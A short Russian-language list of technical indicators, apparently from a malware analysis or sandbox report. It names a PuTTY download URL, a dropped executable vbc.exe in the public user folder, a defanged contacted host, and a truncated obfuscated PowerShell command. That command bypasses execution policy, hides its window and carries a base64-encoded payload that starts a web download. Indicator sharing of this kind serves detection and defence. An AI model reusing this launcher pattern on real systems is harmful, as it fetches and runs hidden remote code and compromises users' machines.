Техническая информация
- https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
- C:\users\public\vbc.exe
- 'th#.#arth.li':443
- DNS ASK th#.#arth.li
- 'C:\users\public\vbc.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' POWERSHeLL.exE -eX ByPaSS -NoP -W 1 -eC CQAJACAAcwBlAFQALQBjAE8ATgBUAGUATgB0ACAAIAAgAC0AVgBhAAkAIAAJACgAIAAJAAkALgAoAGcAYwBNACAAKgBFAHcALQBvACoAKQAJAAkACQBOAGUAdAAuAHcARQBiAEMATABpAEUA...' (со скрытым окном)